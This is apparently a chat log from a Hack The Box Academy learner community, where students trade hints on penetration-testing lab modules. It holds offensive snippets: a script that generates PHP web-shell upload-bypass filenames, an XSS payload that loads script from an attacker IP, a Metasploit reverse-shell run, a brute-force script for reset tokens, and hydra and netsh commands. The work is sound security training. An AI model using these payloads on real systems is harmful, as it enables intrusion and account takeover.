Iirc the blacklist is only like 26 extensions, not sure why you have : in your file names
ok we can do that
[STATUS] 36.00 tries/min, 108 tries in 00:03h, 6892 to do in 03:12h, 4 active
oh true good catch, the : is probably messing things up
```bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done
```
it said to use this script and add more extensions
so I edit it like this
```bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
    for ext in '.php' '.phps' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done
```
Looks promising
some of the examples they gave didn't give then the right extensive so I had to figure it by myself so that what I thought this section was doing
yeah bro thats how it be just think outside of the box sometimes lol
Yeah the examples here just show you how to do it, the challenges are different from the examples in the module so you have to apply what the section teaches to find it.
yupp
ya I like that
Did someone finish https://academy.hackthebox.com/module/113/section/2164? What ip should be added to /etc/hosts? After i unzipped the .jar file and recompiled again I still get the "connection error!" message.
<@&861185840277487616>
The IP in the module does not work?
And you removed the hashes from the meta inf?
You watch ippsec's fatty video?
Yeah, I saw that he also used 10.10.10.174
probably the worst section of any module on the whole platform
the box you're working on is 'fatty' on htb's main platform, many people watch ippsec's video on that to get past this part of the module. that might help you too if you want to look it up.
It's not worst it's horrible. 😄
Yeah I found it. It's so nice explained.
My two cents is to read everything twice on what you're about to do then double check as you're doing it.
I read everything more than twice and I have a hard remembering lol
Hey, once you have the port number changed, remember to add the extra line and delete the files it says to
They said to add that ip in hosts, but they don't tell you what is with that ip. So basically i tried some kind of fuzzing and I added my machine ip, the target ip, the ip given in the module, and finally all the adaptors ip adresses... and found that I had to add the other adaptor ip. 🙂
I went through this with someone recently and they indeed had everything right but we actually removed that etc hosts line and it worked after that
For if you're working on pwnbox that is. Maybe give it a shot. The etc/hosts looked weird too so might be worth checking
Nice 🎉
I am currently stuck at Section: Session Hijacking for Module: Cross-Site Scripting XSS.
Question: I have tried the different payloads in the full name, username, image url fields. The payload format: <script src=http://OUR_IP:8001/field_name></script>, and submit the form, why cant i find any vulnerable field.
Before submitting the payload, I have set up netcat listener
```
sudo nc -lvnp 8001
```
Does it need a character to begin the payload?
Think of how html looks and how your code would look if you were to just plop it in there. Maybe there's something you can do to clean it up a bit.
ok perhaps i will try the diff payloads with diff starting characters
im thinking along the line of inspecting the source code, and see how the input are being inserted into the code
No need to dig that deep, just mock it up in notepad
Try " in the beginning to close the current html tag, then add your script, and open another html tag to close the one you're in if that makes sense? to keep the syntax clean
ok i get what you mean, thanks for the direction
i managed to solve and retrieve the flag, thanks for the tip
Nice one
Nice 😄
I am currently working on a module called "https://academy.hackthebox.com/module/39/section/407" and attempting to execute its only exercise.
However, I am encountering the same output every time, despite my attempts to modify the payloads and RPORTS:
```
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_druid_js_rce) >> run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Using URL: http://10.0.2.15:8080/JGFkg4uMmdo
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.
```
I have tried several variations but with no success. Is anyone else experiencing the same issue?
Are you able to obtain a meterpreter shell at all?
10.0.2.15 is your tun0?
let me check
Can anyone help me with the question on htb academy?
What is the name of the first section of this module? If you are using a translation solution while studying, please disable it temporarily to enter the first section's name in English.
the modules are broken down into sections. it looks like the question is asking you what the first section of the module is named.
if you look at the table of contents on the right, you can see each page of the module is broken down into different sections
Pwnboxes in Academy are not spawning. Could someone look into this?
It says "Request validation failed."
It also seems they are all down (UK, DE, ...).
yes, 500.000k $
this is not the server for your request
I was using the wrong NIC. I gotta say, you spotted my mistake pretty quick. Thanks for the tip
create new account
email support
But when I typed Introduction, he said there was an error.
You said your issue was logging in, in which case you should email support. This isn't really a support channel for that kind of stuff and no one in here can assist you in logging in to your account.
No! This is the question
What is the name of the first section of this module? If you are using a translation solution while studying, please disable it temporarily to enter the first section's name in English.
what module is it
what is the name of the module
ok well i looked it up, you got the answer right
make sure there are no whitespaces etc
anyone else having vpn issues? got around 100% packet loss xD
This just a question on htb academy
which Module you on?
he's on this, and he has the correct answer, so likely a browser issue or him just mistyping. https://academy.hackthebox.com/module/15/section/34
hmm maybe whitespace after the word he needs to remove, happened to me multiple times stuff like that xD
I would rather use a simple msfvenom to create an *.msi file to get the priv I am looking for!
Try migrating to a more stable process 😉
Start first by doing a good recon, use SharpUP.exe 🙂
impacket-secretsdump is your friend!
why are you replying to a 2 year old message 
better late than never 😄
Guys what is the solution to this question ? 👇
Create a token on the web application exposed at subdirectory /question1/ using the *Create a reset token for htbuser* button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?
It's been two days and I haven't been able to solve the question !
providing the module and section would be useful
but here #modules message
Guys, im doing the AD skill assessment part 1. I need help how to connect to MS01?
pivot
I tried again and again, but to no avail
my reset_token_time.py :
```python
from hashlib import md5
import requests
from sys import exit
from time import time

url = "http://X/question1/"

# to have a wide window try to bruteforce starting from 120seconds ago
now = 1713413551000
start_time = now - 1000
fail_text = "Wrong token"
username = "htbadmin"

# loop from start_time to now. + 1 is needed because of how range() works
for x in range(start_time, now + 1000):
    # get token md5
    md5_token = md5((username + str(x)).encode()).hexdigest()
    data = {
        "submit": "check",
        "token": md5_token
    }
    print("checking {} {}".format(str(x), md5_token))
    # send the request
    res = requests.post(url, data=data)
    # response text check
    if not fail_text in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()
```
follow the message that I linked
I followed it 
are you converting the timestamp?
I am having trouble with the exercise in this section module:
https://academy.hackthebox.com/module/57/section/487
" Try running the same exercise on the question from the previous section, to learn how to brute force for users. "
||
"hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt -u -f 94.237.56.188 -s 56695 http-get /
"||
I ran the above command and so far its been running for several minutes
I haven't done that module, but looking at the question it's asking you to bruteforce a username. The section directly before the question "Username Brute Force" tells you exactly what you need to do here. Your command is going to go through every single username and every single password in the rockyou.txt list.
||I know its going to be the exact same answer as the last question , but I wanted to get that result using the approaches in this module section.||
my answer is the approach the module gives you
the answer is your command is wrong
follow the command in the module instead
I think you're supposed to use the password that you know and give it a user list instead
I did
the example you posted in here with your message is not the correct command
the command in the module used a single password
should it work with netsh.exe?
Okay . Fixed it
ngr
what?
Just hit 100% on CPTS path. Wanted to say thanks to all the legends here that helped me out along the way. It's in God's hands now 
Any hint on how to transfer socks over RDP server. Exe for academy.hackthebox.com/module/158/section/1439 scp doesn’t work, python server doesn’t work
Invoke doesn’t work
Heyo working on Passwords Attacks - Network Services.. I have cracked some logins using Hydra and the provided lists but when I try to RDP with xfreerdp I get a connect cancelled 😦 Anybody got an idea?
Provide a real link yours doesn't work
OKAY, ill just give up for today, cant even do an nmap scan without waiting an hour xD
Can anyone give me a clear hint which file transfer method is best
That’s all I’m asking
there is no 'best', the different methods are for different situations
if you provide the module/question you're working on you'd get a better answer
RDP transfer it is
http/s def works over pivots, you probably set something wrong
ahh yeah i used the mstsc.exe like that section shows
I see it now. So it says to download it first but it says after that use mats and enable it the directions are a bit backwards
Mstsc
remember to run cmd as admin and disable real-time protection
Thanks bud
Im having an issue with one of the modules. Data is missing. Where can I report this issue?
Hey everyone, I'm stuck on the skill assessment of the command injection module, I can't find the injection point. Can anyone give me a hint please?
Click on every single link with BurpSuite proxy on, look at each request you make and think about what actions the website performs that would cause it to run a system command as you go through them all.
Reach out to support
Thanks, I'll do this
I wrote a power shell script to serve over 8000
Worked
I have downloaded the dll and the .exe but the DLL module was loaded but the entry point DLL register server was not found, this is brutal
you got the DLL loaded?
Yes and there was no real time protection on victor to begin with
I brought it over both the DLL to victor and the .exe,
the exe doesn't work on victor or something?
Plugin not loaded on client side 31
Need a little hand on WEB SERVICE & API ATTACKS: Web Service & API Attacks - Skills Assessment
Question:
Submit the password of the user that has a username of "admin". Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.
Crafted a python script for the SQL injection, tried different sql injection commands but couldn't find the password for the admin
Can anyone give a nudge to solve this?
Got the flag, I missed one feature of the website, thanks for the advice
yo draries
I'm experiencing since the start of the week.
<@&861185840277487616>
Nice glad you got it!
lol im doing the command injection module atm
Mine were all 2000ms ping yesterday
i found the ans but its not accepting it can i verify with someone the ans
check the hint for the expected format
still timeout, any hints?
AD Enumeration & Attacks - Skills Assessment Part I im on the last question How to get access to DC01 any hints?
do that attack
yeah the attack from question 7
hello i was doing a module and this command worked 'php://filter/convert.base64-encode/resource=index' but not 'php://filter/convert.base64-encode/resource=index.php'. does this mean the index file is not a php file?
@cloud urchin Hey on the file uploads attack module should I use that script to create a wordlist
what script
```bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done
```
im on the whitelist filters in the file uploads attack
yeah i think you'll need to do that for that one
ok
also i do recommend just in case adding all of the php extensions so you have a higher chance of finding one that works
i believe its bc it automatically adds a .php at the end of the index so if u add index.php it will show up as index.php.php which wont work
im running secretsdump.py and its saying connection error I tried both DC1 and MSO1 ip
Dc01?
@slate halo are you using proxychains?
typo
I'm not familiar with netsh.exe but how are you tunneling between the attack host to MS01 to reach DC01?
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=AttackHost connectport=3389 connectaddress=MS01
3389 is an rdp port, do you think secretsdump uses rdp?
^
^
Does it?
I didn't think so.
Which is GUI
I've seen stranger things.
that's what I use to connect to MS01
Well you were asked how you're communicating with dc01
I'm not getting to that module until this weekend. I'm really excited to get there though 🙂
in fact I believe secretsdump would need access to multiple ports to perform that attack, RPC, SMB, LDAP, so I'd suggest to use a tool that allows you to forward more than 1 port
Pretty sure you can just download secretsdump.exe for windows and copy and paste in the xfreerdp session
Hello. In the module "Footprinting", there is a zip file in the resources containing a wordlist, but it is never said to use it anywhere in the module. What is the purpose of this wordlist? Thanks.
You use it whenever a username or pw or both wordlist is required
Just use ligolo
does someone mind helping me with the file upload attack module? I'm on the whitelist section and last I had 106 successfull uploads now I'm getting zero.
feel free to dm me
They're often not gonna tell you directly to use the provided wordlist, it's implied
Try to find a extension that allow executing code with php
Ok, thanks. I am surprised because it is explicitly mentioned to use the wordlists in the "Password attacks" module.
But after it never explicitly told you to use the mutated list
It was implied to use it
I run the secretsdump what do i do next? I use the admin hash?
Sounds like it to me
For Enter-PSSession?
Im running powershell as t*** and im doing the mimikatz part but I get privilege error
privilege error as in privilege::debug and not receiving '20' as output?
yes
Did you run powershell as admin?
port forwarding
i performed the attack and got Admin ntlm hash and some kerberos key. How do i use that to gain access to DC01?
Perform the attack from question 7. It has a specific module that teaches you how to do it in the AD module.
i cant find where i can inject the command injection on the skills lab T-T i clicked all of the buttons and nothing
if you performed the attack, then you should have access to get to DC01. Check the modules for different ways to get a shell on DC01 with that information.
any hint would be appreciated
DM me
And no one can help you because there's not enough information to go off of
I still failed to do the Linux Privilege Exploitation - Sudo Rights Abuse --- Following gtfobins sudo exploit for openssl did not work for me. Not really sure why. Might need to try on the pwnbox instead of my kali box...
I did it got the final flag
Thank you guys for the hints
gz man. keep going!
this helped me with the openssl https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/openssl-privilege-escalation/
for the linux privesc final lab, am I supposed to get ||flag 4|| before ||flags 2 and 3||?
You can but the other flags were with what you had access to prior, so you could have grabbed them along the way.
||flag4|| required no auth at all to get though? unless i did it wrong?
sounds like it's my best interest to just proceed to root and grab all the ||flags|| i need?
It requires some auth to get to....
true but ||i got this auth from the ssh session htb gives me so i assumed it would be flag2 not 4||
Which is true for another as well
😠

Did you practice on any HTB boxes before taking the CPTS? If so, do you have a list?
I found something interesting...
I only did for more time on a keyboard, nothing specific. The AEN module will provide the best practice without going out of scope.
Yes that module looks the most interesting to me...
I'm looking forward to it.
Could I dm someone who passed HTTP Attacks Skills Assessment, I ran out of ideas after trying for 8 days. Seems that I got the TE.CL via te.te and crafted the payload to passthru WAF, but email is not triggering.
so i got root, is it recommended to still try to get the other flags the intended way or just move on
I think flag 2 would have been the only one, it's good to know
Hi guyz, I learned a little about ssh from getting started module but Im having an issue:
I generated Private and public keys on my Kali virtual machine. I imported the private key into my Ubuntu Virtual machine and entered command chmod 600 id_rsa.
I then entered user@<kalimachineip> -i id_rsa on my ubuntu Vm terminal but it said connection refused...
Can some one tell me why this happened?
Is the kali machine running ssh?
no it wasnt, I just did it with the "sudo service ssh start" command
thanks
Also, is the username in your kali machine "user"
ssh [username]@[server] -i id_rsa
no its bilalsavage, I just typed user here for understanding purposes

hello guys, is attacking common service's easy assessment supposed to be hard
or Im missing something very obvious
what have you tried so far